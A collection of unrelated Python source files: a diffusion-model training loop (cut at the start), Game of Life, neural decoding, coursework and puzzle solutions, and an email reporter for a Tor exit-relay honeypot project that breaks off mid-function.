train(\n self,\n trainset,\n accelerator: Accelerator,\n logger: pl.loggers.WandbLogger,\n ):\n \"\"\"\n Trains the model to generate images.\n\n Args:\n trainset: Torch Dataset\n accelerator: Diffusors Accelerator to train on multiple devices\n logger: Pytorch Lightning W&B Logger.\n \"\"\"\n self.on_fit_start()\n self.logger = logger\n self.noise_scheduler = DDPMScheduler(\n num_train_timesteps=1000,\n beta_schedule=self.config.ddpm_beta_schedule,\n )\n self.optimizer = torch.optim.AdamW(\n self.model.parameters(),\n lr=self.config.gen_lr,\n betas=self.config.gen_betas,\n weight_decay=1e-6,\n )\n self.lr_scheduler = get_scheduler(\n self.config.lr_scheduler,\n optimizer=self.optimizer,\n num_warmup_steps=int(\n self.config.warmup_perc * self.config.train_steps\n ),\n num_training_steps=self.config.train_steps\n // self.config.gradient_accumulation_steps,\n )\n self.model = accelerator.prepare(self.model)\n self.optimizer = accelerator.prepare(self.optimizer)\n trainset = accelerator.prepare(trainset)\n self.lr_scheduler = accelerator.prepare(self.lr_scheduler)\n\n self.ema_model = EMAModel(\n self.model,\n inv_gamma=self.config.ema_inv_gamma,\n power=self.config.ema_power,\n max_value=self.config.ema_max_decay,\n )\n\n run = os.path.split(__file__)[-1].split(\".\")[0]\n accelerator.init_trackers(run)\n\n progress_bar = tqdm(\n total=self.config.train_steps,\n disable=not accelerator.is_local_main_process,\n )\n evaluate_every_n_steps = self.config.train_steps // self.config.n_evals\n self.model.train()\n while self.global_step < self.config.train_steps:\n batch = next(iter(trainset))\n logs = self.train_step(batch, accelerator=accelerator)\n progress_bar.set_postfix(**logs)\n self.logger.log_metrics(logs, step=self.global_step)\n if self.global_step % evaluate_every_n_steps == 0:\n accelerator.wait_for_everyone()\n if 
accelerator.is_main_process:\n pipeline = DDPMPipeline(\n unet=accelerator.unwrap_model(\n self.ema_model.averaged_model\n ),\n scheduler=self.noise_scheduler,\n )\n self.evaluate(pipeline)\n pipeline.save_pretrained(self.config.learning_progress_path)\n progress_bar.update(1)\n self.global_step += 1\n accelerator.wait_for_everyone()\n accelerator.end_training()\n progress_bar.close()\n\n def train_step(\n self, batch: Dict, accelerator: Accelerator\n ) -> torch.Tensor:\n \"\"\"\n Performs a single gradient update on a given batch.\n\n Args:\n batch: Datasample dictionary. Images should be at key \"input\"\n accelerator: Diffusors Accelerator to train on multiple devices\n \"\"\"\n clean_images = batch[\"input\"]\n\n # Sample noise that we'll add to the images\n noise = torch.randn(clean_images.shape).to(clean_images.device)\n\n # Sample a random timestep for each image\n timesteps = torch.randint(\n 0,\n self.noise_scheduler.config.num_train_timesteps,\n (self.config.batch_size,),\n device=clean_images.device,\n ).long()\n\n # Add noise to the clean images according to the noise magnitude at each timestep. This is the forward diffusion process\n noisy_images = self.noise_scheduler.add_noise(\n clean_images, noise, timesteps\n )\n with accelerator.accumulate(self.model):\n # Predict the noise residual\n model_output = self.model(noisy_images, timesteps).sample\n loss = F.mse_loss(model_output, noise)\n\n accelerator.backward(loss)\n if accelerator.sync_gradients:\n accelerator.clip_grad_norm_(self.model.parameters(), 1.0)\n self.optimizer.step()\n self.lr_scheduler.step()\n self.ema_model.step(self.model)\n self.optimizer.zero_grad()\n\n # Checks if the accelerator has performed an optimization step behind the scenes\n if accelerator.sync_gradients:\n logs = {\n \"loss\": loss.detach().item(),\n \"lr\": self.lr_scheduler.get_last_lr()[0],\n \"step\": self.global_step,\n \"ema_decay\": self.ema_model.decay,\n }\n return logs\n\n def evaluate(self, pipeline) -> np.ndarray:\n \"\"\"\n Performs a single evaluation step at the current state of the model.\n\n Args:\n pipeline: diffusers DDPMPipeline to perfrom inference\n \"\"\"\n deprecate(\n \"todo: remove this check\",\n \"0.10.0\",\n \"when the most used version is >= 0.8.0\",\n )\n if diffusers_version < version.parse(\"0.8.0\"):\n generator = torch.manual_seed(0)\n else:\n generator = torch.Generator(device=pipeline.device).manual_seed(0)\n # run pipeline in inference (sample random noise and denoise)\n images = pipeline(\n generator=generator,\n batch_size=25,\n output_type=\"numpy\",\n ).images\n\n # denormalize the images\n images_processed = (images * 255).round().astype(\"uint8\")\n images_list = [\n Image.fromarray(img.astype(np.int8), \"RGB\")\n for img in images_processed\n ]\n self.logger.log_image(\n key=\"test/examples\",\n images=images_list,\n step=self.global_step,\n )\n return images_processed\n\n def on_fit_start(self):\n \"\"\"\n This method gets executed before a Trainer trains this model.\n\n It tells the W&B logger to watch the model in order to check the\n gradients report the gradients if W&B is online.\n \"\"\"\n from utils import logger\n\n Path(self.config.learning_progress_path).mkdir(\n parents=True, exist_ok=True\n )\n if hasattr(self, \"logger\"):\n if isinstance(self.logger, pl.loggers.WandbLogger):\n try:\n self.logger.watch(self, log=\"all\")\n except ValueError:\n logger.info(\"The model is already on the watchlist\")\n self.wandb_run_id = self.logger.experiment.id\n self.wandb_run_name = 
self.logger.experiment.name\n","repo_name":"mcschmitz/duck_and_cover","sub_path":"networks/ddpm.py","file_name":"ddpm.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"59448109","text":"import pygame\n\nclass Game:\n\tdef __init__(self):\n\t\tself.liveCells = dict()\n\t\tself.white = pygame.Color(255,255,255)\n\n\tdef addCell(self, pos):\n\t\tself.liveCells[pos] = 0\n\n\tdef countNeighbors(self, pos):\n\t\tneighboringCells = self.getNeighborPositions(pos)\n\t\tneighborCount = 0\n\t\tfor cell in neighboringCells:\n\t\t\tif cell in self.liveCells:\n\t\t\t\tneighborCount += 1\n\t\treturn neighborCount\n\n\tdef getNeighborPositions(self, pos):\n\t\t(x,y) = pos\n\t\treturn ((x-1, y-1),\n\t\t\t\t(x, y-1),\n\t\t\t\t(x+1, y-1),\n\t\t\t\t(x-1, y),\n\t\t\t\t(x+1,y),\n\t\t\t\t(x-1, y+1),\n\t\t\t\t(x, y+1),\n\t\t\t\t(x+1, y+1))\n\n\tdef updateNeighborCounts(self):\n\t\t# initialize min and max to first key x y\n\t\t(minx, miny) = list(self.liveCells.keys())[0]\n\t\tmaxx = minx\n\t\tmaxy = miny\n\t\tfor cell in self.liveCells:\n\t\t\tself.liveCells[cell] = self.countNeighbors(cell)\n\t\t\t# also update min and max\n\t\t\tif cell[0] < minx:\n\t\t\t\tminx = cell[0]\n\t\t\tif cell[0] > maxx:\n\t\t\t\tmaxx = cell[0]\n\t\t\tif cell[1] < miny:\n\t\t\t\tminy = cell[1]\n\t\t\tif cell[1] > maxy:\n\t\t\t\tmaxy = cell[1]\n\t\tself.min = (minx, miny)\n\t\tself.max = (maxx, maxy)\n\n\tdef determineNewCells(self):\n\t\tnewCells = dict()\n\t\tfor cell in self.liveCells:\n\t\t\tfor adjacentCell in self.getNeighborPositions(cell):\n\t\t\t\tif adjacentCell not in self.liveCells and self.countNeighbors(adjacentCell) == 3:\n\t\t\t\t\tnewCells[adjacentCell] = 3\n\t\treturn newCells\n\n\tdef findDyingCells(self):\n\t\tdyingCells = list()\n\t\tfor cell, neighbors in self.liveCells.items():\n\t\t\tif neighbors < 2 or neighbors > 3:\n\t\t\t\tdyingCells.append(cell)\n\t\treturn dyingCells\n\n\tdef nextCycle(self):\n\t\tcellsBeingBorn = self.determineNewCells()\n\t\tfor cell in self.findDyingCells():\n\t\t\tdel self.liveCells[cell]\n\t\tself.liveCells.update(cellsBeingBorn)\n\t\tself.updateNeighborCounts()\n\n\tdef draw(self, screen, offset = (0,0), cellSize = (4,4), color = 'white'):\n\t\tif color == 'white':\n\t\t\tcolor = self.white\n\t\tfor cell in self.liveCells:\n\t\t\tself.drawCell(cell, screen, offset, cellSize, color)\n\n\tdef drawCell(self, cell, screen, offset, cellSize, color):\n\t\tcellRect = self.locateCell(cell, cellSize, offset)\n\t\tscreen.fill(color, cellRect)\n\n\tdef locateCell(self, cell, cellSize, offset):\n\t\tx, y = cell\n\t\txscale, yscale = cellSize\n\t\txoffset, yoffset = offset\n\t\tx = x * xscale + xoffset\n\t\ty = y * yscale + yoffset\n\t\tcellRect = pygame.Rect((x, y), cellSize)\n\t\treturn cellRect\n","repo_name":"malaclypse1/ConwaysGameOfLife","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70870193187","text":"import pandas as pd\nimport pickle\nimport pdb\nimport os\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nimport statsmodels\nfrom tqdm import tqdm\nimport sys\nimport numpy.matlib\n\nsample_from = np.random.choice\n\n\ndef sample_from_population(df, N_trials,N_units,ctr_idx,dur_idx,):\n remove_list = []\n # make sure that the corresponding df has data\n for idx,row in df.iterrows():\n if row.response_hist[0][ctr_idx][dur_idx].size==0 or row.response_hist[1][ctr_idx][dur_idx].size==0:\n remove_list.append(idx)\n df = df.drop(remove_list)\n if df.count==0:\n return [],[],'no_data'\n sub_df = df.sample(n=N_units,replace=True)\n units_this_sample = sub_df.unit_id\n \n orientations = np.random.choice([0,1],N_trials)\n X = np.full((orientations.size,N_units),np.nan)\n\n for ii,ori in enumerate(orientations):\n for jj,unit in enumerate(units_this_sample):\n r_hist = sub_df.iloc[jj].response_hist\n relevant_resp = r_hist[ori][ctr_idx][dur_idx]\n try:\n X[ii,jj] = sample_from(relevant_resp)\n except ValueError:\n print('relevant_resp:',relevant_resp)\n\n return X,orientations,'nominal'\n \ndef sample_from_population_simple(df,N_trials,N_units,ctr_idx,dur_idx,):\n remove_list = []\n # make sure that the corresponding df has data\n for idx,row in df.iterrows():\n if row.response_hist[0][ctr_idx][dur_idx].size==0 or row.response_hist[1][ctr_idx][dur_idx].size==0:\n remove_list.append(idx)\n df_removed = df.drop(remove_list)\n if df.count==0:\n print('bad')\n return [],[],[],[],'no_data'\n try:\n sub_df = df_removed.sample(n=N_units,replace=True)\n except:\n pdb.set_trace()\n units_this_sample = sub_df.unit_id\n \n orientations = np.random.choice([0,1],N_trials)\n orientations = np.sort(orientations)\n X = np.full((orientations.size,N_units),np.nan)\n c_vec = np.full((1,N_units),np.nan)\n i_vec = c_vec.copy()\n for jj,unit in enumerate(units_this_sample):\n c_vec[0,jj] = sub_df.iloc[jj].mean_coeff_shortdur\n i_vec[0,jj] = sub_df.iloc[jj].mean_intercept_shortdur\n r_hist = sub_df.iloc[jj].response_hist\n num_trials_0 = np.sum(orientations==0)\n num_trials_1 = np.sum(orientations==1)\n relevant_resp_0 = r_hist[0][ctr_idx][dur_idx]\n relevant_resp_1 = r_hist[1][ctr_idx][dur_idx]\n try:\n X[0:num_trials_0,jj] = sample_from(relevant_resp_0,size=num_trials_0)\n X[num_trials_0:,jj] = sample_from(relevant_resp_1,size=num_trials_1)\n except ValueError:\n pdb.set_trace()\n print('relevant_resp:',relevant_resp)\n C = numpy.matlib.repmat(c_vec,N_trials,1)\n I = numpy.matlib.repmat(i_vec,N_trials,1)\n \n\n return X,orientations,C,I,'nominal'\n\n\ndef get_performance_for_virtual_session(total_df,N_samplings,N_trials,N_units,ctr_idx,dur_idx):\n performances_that_condition = []\n\n for i in tqdm(range(N_samplings)):\n retry = True\n while retry:\n X,y,reason = sample_from_population(total_df,N_trials,N_units,ctr_idx,dur_idx)\n if reason=='no_data':\n performances_that_condition = []\n return performances_that_condition\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25)\n\n X_train = np.insert(X_train,0,1.0,axis=1)\n X_test = np.insert(X_test,0,1.0,axis=1)\n try:\n logreg = sm.Logit(y_train,X_train)\n res = logreg.fit(disp=False,maxiter=100)\n predicted = res.predict(X_test)\n predicted = (predicted>=0.5)\n perf = np.sum(predicted==y_test)/y_test.size\n retry = False\n except Exception as e:\n print(e)\n retry = True\n \n \n performances_that_condition.append(perf)\n return performances_that_condition\n \ndef 
get_performance_for_virtual_session_simple(total_df,N_samplings,N_trials,N_units,ctr_idx,dur_idx):\n performances_that_condition = []\n performances_that_condition_unweighted = []\n num_spikes_total = []\n num_spikes_differential = []\n for i in tqdm(range(N_samplings)):\n X,y,C,I,reason = sample_from_population_simple(total_df,N_trials,N_units,ctr_idx,dur_idx)\n if reason=='no_data':\n performances_that_condition = []\n return performances_that_condition\n y_pred = np.sum(X*C+I,axis=1)\n y_pred = y_pred>0\n perf = np.sum(y_pred==y)/y.size\n \n C_unweighted = C/np.abs(C)\n y_pred_unweighted = np.sum(X*C_unweighted,axis=1)\n y_pred_unweighted = y_pred_unweighted>0\n perf_unweighted = np.sum(y_pred_unweighted==y)/y.size\n \n num_spikes_total_per_trial = np.squeeze(np.sum(X,axis=1))\n num_spikes_differential_per_trial = np.abs(np.squeeze(np.sum(X*C_unweighted,axis=1)))\n \n performances_that_condition.append(perf)\n performances_that_condition_unweighted.append(perf_unweighted)\n num_spikes_total.append(np.mean(num_spikes_total_per_trial))\n num_spikes_differential.append(np.mean(num_spikes_differential_per_trial))\n return performances_that_condition,performances_that_condition_unweighted,num_spikes_total,num_spikes_differential\n \nif __name__=='__main__':\n which = int(sys.argv[1])\n which = which-1\n # total_df = pd.read_pickle('/camhpc/home/bsriram/v1paper/v1-paper-analysis/Figure4/DecodingOfPopulation_onlyConsistent.df')\n # total_df = pd.read_pickle('Figure4\\DecodingOfPopulation_onlyConsistent.df')\n total_df = pd.read_pickle('/camhpc/home/bsriram/data/Analysis/DecodingOfPopulation_onlyConsistent.df')\n save_loc = '/camhpc/home/bsriram/data/Analysis/PerfByPopsize'\n # save_loc = r'C:\\Users\\bsriram\\Desktop\\Data_V1Paper\\Analysis\\PopulationDecoding'\n # sample N units and create a session for C = 0.15, dur = 0.1\n potential_n_units = np.arange(1,201,1)\n potential_n_units = np.concatenate((potential_n_units,np.arange(205,401,5)),axis=None)\n potential_n_units = np.concatenate((potential_n_units,np.arange(450,1001,50)),axis=None)\n potential_n_units = np.concatenate((potential_n_units,np.arange(1500,10001,500)),axis=None)\n \n # for N_units in potential_n_units:\n N_units = potential_n_units[which]\n N_trials = 1000\n N_samplings = 10000\n potential_orientations = np.array([-45,45])\n \n potential_contrasts = np.array([0,0.15, 1])\n interested_contrasts = np.array([0.15, 1])\n correct_index_ctrs = [1,2]\n potential_durations = np.array([0.05,0.1,0.15, 0.2])\n interested_durations = np.array([0.05,0.1, 0.15,0.2])\n correct_index_durs = [0,1,2,3]\n\n print('running for num population==',N_units)\n file_for_pop_size = 'population_{0}.pickle'.format(N_units)\n data_all_condns = []\n for kk,ctr in enumerate(interested_contrasts):\n ii = correct_index_ctrs[kk]\n for ll,dur in enumerate(interested_durations):\n print('ctr:',ctr,' dur:',dur)\n jj = correct_index_durs[ll]\n data_that_condition = {}\n data_that_condition['contrast'] = ctr\n data_that_condition['duration'] = dur\n perf_that_condn,perf_unweighted,n_spikes_tot,n_spikes_diff = get_performance_for_virtual_session_simple(total_df,N_samplings,N_trials,N_units,ii,jj)\n data_that_condition['performances'] = perf_that_condn\n data_that_condition['performances_unweighted'] = perf_unweighted\n data_that_condition['spikes_total'] = n_spikes_tot\n data_that_condition['spikes_differential'] = n_spikes_diff\n \n data_all_condns.append(data_that_condition)\n print('saving to ',file_for_pop_size)\n with 
open(os.path.join(save_loc,file_for_pop_size),'wb') as f:\n pickle.dump(data_all_condns,f)\n \n \n \n ","repo_name":"balajisriram/v1-paper-analysis","sub_path":"Figure4/predict_population_requirement.py","file_name":"predict_population_requirement.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"25806307134","text":"#!/usr/bin/env python3\n\"\"\" this module contains the neural network model\"\"\"\n\nimport numpy as np\n\n\nclass NeuralNetwork:\n \"\"\" Neural neetwork with one hidden layer\n performing binary classification\"\"\"\n def __init__(self, nx, nodes):\n \"\"\"class constructor \"\"\"\n if type(nx) != int:\n raise TypeError(\"nx must be an integer\")\n if nx < 1:\n raise ValueError(\"nx must be a positive integer\")\n if type(nodes) != int:\n raise TypeError(\"nodes must be an integer\")\n if nodes < 1:\n raise ValueError(\"nodes must be a positive integer\")\n self.__W1 = np.random.randn(nodes, nx)\n self.__b1 = np.zeros((nodes, 1))\n self.__A1 = 0\n self.__W2 = np.random.randn(1, nodes)\n self.__b2 = 0\n self.__A2 = 0\n\n @property\n def W1(self):\n \"\"\"returns private W1\"\"\"\n return self.__W1\n\n @property\n def b1(self):\n \"\"\"returns private b1 \"\"\"\n return self.__b1\n\n @property\n def A1(self):\n \"\"\" returns private A1\"\"\"\n return self.__A1\n\n @property\n def W2(self):\n \"\"\"returns private W2\"\"\"\n return self.__W2\n\n @property\n def b2(self):\n \"\"\" returns self b2\"\"\"\n return self.__b2\n\n @property\n def A2(self):\n \"\"\"return self A2 \"\"\"\n return self.__A2\n","repo_name":"Nukemenonai/holbertonschool-machine_learning","sub_path":"supervised_learning/0x00-binary_classification/9-neural_network.py","file_name":"9-neural_network.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70586610786","text":"#!/usr/bin/python\n\n# usage: comparechecksums.py original_checksums new_checksums\n\nimport sys\n\nfile1 = sys.argv[1] # original checksums in column 1 of tsv\nfile2 = sys.argv[2] # new checksums in column 1 of tsv\n\nprint('infile1'+':'+file1)\nprint('infile2'+':'+file2)\n\n# get the checksums\n\nfile1checksums = open(file1, 'r') # with open is a bit tidier?\nfile2checksums = open(file2, 'r')\n\nfile1_list = []\nfile2_list = []\n\n# for file 1\nfor line in file1checksums:\n\tv1, v2 = line.split('\\t')\n\tfile1_list.append(v1) # add the ith row checksum\n\nprint(file1_list)\n\n# for file 2\nfor line in file2checksums:\n\tv1, v2 = line.split('\\t')\n\tfile2_list.append(v1) # add the ith row checksum\n\nprint(file2_list)\n\n# print lengths of lists\n\nprint('length infile1'+':',len(file1_list))\nprint('length infile1'+':',len(file2_list))\n\n# test if equal and print results\n\nif file1_list == file2_list:\n\tprint('checksums identical')\nelse:\n\tprint('checksums non-identical')\n\tfor element in file1_list:\n\t\tif element not in file2_list:\n\t\t\tprint('missing elements')\n\t\t\tprint(element)\n\n\n","repo_name":"crj32/python_general_scripts","sub_path":"comparechecksums.py","file_name":"comparechecksums.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10108742117","text":"import sys\ninput = sys.stdin.readline\n\nn, s = map(int, input().split())\nnum_list = list(map(int, input().split()))\n\nans = 0\n\n\ndef subSet(idx, total):\n global ans\n\n if idx >= n:\n return\n total += num_list[idx]\n if total == s:\n ans += 1\n # 부분수열을 만드는 두가지 경우의 수, 현재 값을 뺀 다음값부터 포함시킴\n subSet(idx + 1, total - num_list[idx])\n # 현재 값을 포함시켜 다음값을 찾음\n subSet(idx + 1, total)\n\n\nsubSet(0, 0)\nprint(ans)\n","repo_name":"MaxKim-J/Algo","sub_path":"problems/202101/boj-1182-부분수열의합.py","file_name":"boj-1182-부분수열의합.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"20859956578","text":"from __future__ import print_function # must be first in file \nimport random\n#1\ndef food_id(food):\n ''' Returns categorization of food\n\n food is a string\n returns a string of categories\n '''\n # The data\n fruits = ['apple', 'banana', 'orange']\n citrus = ['orange']\n starchy = ['banana', 'potato']\n\n # Check the category and report\n if food in fruits:\n if food in citrus:\n return 'Citrus, Fruit'\n else:\n return 'NOT Citrus, Fruit'\n else:\n if food in starchy:\n return 'Starchy, NOT Fruit'\n else:\n return 'NOT Starchy, NOT Fruit'\n \n '''\n 1a: \n The code is from line 17\n 1b: \n i:Orange causes line 15 to run\n ii:Apple and banana causes line 17 to run\n iii:Banana and potato causes lin 20 to run\n iv:everything else causes line 22 to run\n 1c: the fruit command is already running so there is no need for the starchy \n line to run anymore.\n '''\n#2 N/A\ndef food_id_test():\n ''' Unit test for food_id\n returns True if good, returns False and prints error if not \n good\n '''\n works = True\n if food_id('orange') != 'Citrus, Fruit':\n works = 'orange bug in food id()'\n if food_id('banana') != 'NOT Citrus, Fruit':\n works = 'banana bug in food_id()' \n # Add tests so that all lines of code are visited during test\n \n if works == True:\n print(\"All good!\")\n return True\n else:\n print(works)\n return False\n#3\ndef f(n):\n \"\"\"Tells you if the number is an integer even, and if its divisible by 6\"\"\"\n if int(n) == n:\n if n % 2:\n print ('The number is odd')\n else:\n if n % 3:\n print ('The number is even')\n else:\n print ('The number is a multiple by 6')\n else:\n print ('The number is not an integer')\n#4\n'''You can try integers, numbers that are divisible by 6, and numbers that are\n even. '''\n#5\ndef f_test():\n '''Testing for code on #5 to see if it works, returns true is it works'''\n works = True\n if f(1) != 'The number is odd':\n works = 'something wrong'\n if f(4) != 'The number is a multiple of 6':\n works = 'something wrong'\n if f(1.4)!= 'The number is an integer':\n works = 'something wrong'\n if f(2) != 'The number is even':\n works = 'something wrong'\n if works == True:\n print ('Alright!')\n return True\n else:\n print (works)\n return False\n#7\n\"\"\"The difference between + as a concatenation and + as numerical addition is that\nconcatenation is adding string and numerical addition is adding numbers\"\"\"\n#8\ndef guess_once():\n secret = random.randint(1, 4)\n print('I have a number between 1 and 4.')\n guess = int(raw_input('Guess: '))\n if guess >= secret:\n print('Too high - my number was', secret)\n if guess <= secret:\n print('Too low - my number was', secret)\n if guess == secret:\n print('Right, my number is', guess, end='!\\n')\n #a\n '''Line 11(102)print thats the user guessed the number correctly'''\n #1.3.4 Function Test\n#9\ndef quiz_decimal (low, high):\n decimal = random.randint \n print ('Type a number between ', low, 'and ', high)\n guesss = int(raw_input('Guess: '))\n if guesss >= decimal:\n print ('No, ', guesss, 'is greater than', high)\nprint(food_id('apple'))\nfood_id_test()\nf(1.1)\nf(2)\nf(3)\nf(6)\nf_test()\nguess_once()\nguess_once()\nquiz_decimal(4, 4.1)\nquiz_decimal(4, 4.1)\n\n","repo_name":"ConnorPark/csp_python_2018-2019","sub_path":"1.3.4/Park_1.3.4.py","file_name":"Park_1.3.4.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4413635359","text":"\"\"\"\n--- Part Two ---\nNow, you just need to put all of the packets in the right order. Disregard the blank lines in your list of received packets.\n\nThe distress signal protocol also requires that you include two additional divider packets:\n\n[[2]]\n[[6]]\nUsing the same rules as before, organize all packets - the ones in your list of received packets as well as the two \ndivider packets - into the correct order.\n\nFor the example above, the result of putting the packets in the correct order is:\n\n[]\n[[]]\n[[[]]]\n[1,1,3,1,1]\n[1,1,5,1,1]\n[[1],[2,3,4]]\n[1,[2,[3,[4,[5,6,0]]]],8,9]\n[1,[2,[3,[4,[5,6,7]]]],8,9]\n[[1],4]\n[[2]]\n[3]\n[[4,4],4,4]\n[[4,4],4,4,4]\n[[6]]\n[7,7,7]\n[7,7,7,7]\n[[8,7,6]]\n[9]\n\nAfterward, locate the divider packets. To find the decoder key for this distress signal, you need to determine the indices of \nthe two divider packets and multiply them together. (The first packet is at index 1, the second packet is at index 2, and so on.) \nIn this example, the divider packets are 10th and 14th, and so the decoder key is 140.\n\n21890\n\"\"\"\n\nfrom functools import cmp_to_key\n\nwith open(\"challenge_13/input.txt\") as fin:\n parts = fin.read().strip().replace(\"\\n\\n\", \"\\n\").split(\"\\n\")\n\n\ndef compare(a, b):\n if isinstance(a, list) and isinstance(b, int):\n b = [b]\n\n if isinstance(a, int) and isinstance(b, list):\n a = [a]\n\n if isinstance(a, int) and isinstance(b, int):\n if a < b:\n return 1\n if a == b:\n return 0\n return -1\n\n if isinstance(a, list) and isinstance(b, list):\n i = 0\n while i < len(a) and i < len(b):\n x = compare(a[i], b[i])\n if x == 1:\n return 1\n if x == -1:\n return -1\n\n i += 1\n\n if i == len(a):\n if len(a) == len(b):\n return 0\n return 1 # a ended first\n\n # If i didn't hit the end of a, it hit the end of b first\n # This means that b is shorter, which is bad\n return -1\n\n\nlists = list(map(eval, parts))\nlists.append([[2]])\nlists.append([[6]])\nlists = sorted(lists, key=cmp_to_key(compare), reverse=True)\n\n\nfor i, li in enumerate(lists):\n if li == [[2]]:\n a = i + 1\n if li == [[6]]:\n b = i + 1\n\nprint(a * b)\n","repo_name":"roswer13/advent-of-code-2022","sub_path":"2022/challenge_13/challenge_part_two.py","file_name":"challenge_part_two.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12196577385","text":"from dataclasses import dataclass\nfrom trystructure_clusters.service_delivery_point_type import ServiceDeliveryPointType\n\n__NAMESPACE__ = \"http://docs.oasis-open.org/ns/emix/2011/06/power\"\n\n\n@dataclass\nclass ServiceDeliveryPoint(ServiceDeliveryPointType):\n class Meta:\n name = \"serviceDeliveryPoint\"\n namespace = \"http://docs.oasis-open.org/ns/emix/2011/06/power\"\n","repo_name":"sietse/compare-schema-generators","sub_path":"trystructure_clusters/service_delivery_point.py","file_name":"service_delivery_point.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39391622089","text":"import json\nimport asyncio\nfrom datetime import datetime, timedelta\nfrom collections import namedtuple\n\nfrom email.message import EmailMessage\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nfrom dataclasses import dataclass, field\n\nimport aiosmtplib\n\n\n## TODO: Add exception handling\n## TODO: Move incidentReport to other directory\n## TODO: Setup gmail account\n## TODO: Setup secure credential loading system\n## TODO: Write tests\n\n@dataclass\nclass incidentReport:\n\tsenderIP: str\n\tbaitIP: str\n\tbaitService: str\n\tbaitPort: str\n\texitRelayIP: str\n\texitRelayMD: str\n\tbaitSetupTS: str\n\tbaitCatchTS: str\n\trawRequest: str\n\tadditionalInfo: str = field(default=\"None\")\n\n\nclass _email:\n\t_htmlEmailPath = \"src/external/emailTemplate.html\"\n\t_textEmailPath = \"src/external/emailTemplate.txt\"\n\t## NOTE: Temp solution\n\t_authPath = \"secrets/emailAuth.json\"\n\n\tdef __init__(self, hostname: str = \"smtp.gmail.com\", port: int = 465, tls: bool = True) -> None:\n\t\t\"\"\"Here we load the any startup secrets/configurations, and templates\"\"\"\n\t\tself._htmlEmailTemplate = self._loadString(_email._htmlEmailPath)\n\t\tself._textEmailTemplate = self._loadString(_email._textEmailPath)\n\t\t\n\t\t## We'll be sending messages with gmail and using their smtp relay\n\t\tself.smtp_hostname = hostname\n\t\tself.smtp_port = port\n\t\tself.use_tls = tls\n\t\t\n\t\t## We load our email credentials\n\t\tself.username, self.password = self.loadCredentials()\n\t\t\n\t\t## Create an smtp client object for later use\n\t\tself.smtp_client = aiosmtplib.SMTP(self.smtp_hostname, self.smtp_port, self.use_tls)\n\n\n\tdef loadCredentials(self) -> tuple[str, str]:\n\t\twith open(_email._authPath, \"r\") as infile:\n\t\t\tout = json.load(infile)\n\t\treturn out[\"username\"], out[\"password\"]\n\n\n\tdef _loadString(self, pathName: str) -> str:\n\t\twith open(pathName, \"r\") as infile:\n\t\t\treturn infile.read()\n\n\n\tdef _templateReplace(self, templateString: str, incidentDescriptor: str) -> str:\n\t\treturn templateString.format(\n\t\t\tsenderIP = incidentDescriptor.senderIP,\n\t\t\tbaitIP = incidentDescriptor.baitIP,\n\t\t\tbaitService = incidentDescriptor.baitService,\n\t\t\tbaitPort = incidentDescriptor.baitPort,\n\t\t\texitRelayIP = incidentDescriptor.exitRelayIP,\n\t\t\texitRelayMD = incidentDescriptor.exitRelayMD,\n\t\t\tbaitSetupTS = incidentDescriptor.baitSetupTS,\n\t\t\tbaitCatchTS = incidentDescriptor.baitCatchTS,\n\t\t\trawRequest = incidentDescriptor.rawRequest,\n\t\t\tadditionalInfo = incidentDescriptor.additionalInfo\n\t\t)\n\n\n\tasync def sendEmail(self, incidentDescriptor: namedtuple) -> bool:\n\t\t\"\"\"This will send an email about the suspicous exit relay\"\"\"\n\t\ttextEmail = self._templateReplace(self._textEmailTemplate, incidentDescriptor)\n\t\thtmlEmail = self._templateReplace(self._htmlEmailTemplate, incidentDescriptor)\n\t\temailMessage = self._prepareEmailMessage(textEmail, htmlEmail)\n\t\treturn await self._sendEmail(emailMessage) \n\n\n\tdef _prepareEmailMessage(self, textEmail: str, htmlEmail: str) -> bool:\n\t\t## https://realpython.com/python-send-email/#sending-fancy-emails\n\t\tmessage = MIMEMultipart(\"alternative\")\n\n\t\tmessage[\"From\"] = \"beelurer@example.com\"\n\t\tmessage[\"To\"] = \"test-2bcad6@test.mailgenius.com\"\n\t\tmessage[\"Subject\"] = \"Potentially malicious exit relay detected\"\n\n\t\ttextPart = MIMEText(textEmail, \"plain\")\n\t\thtmlPart = 
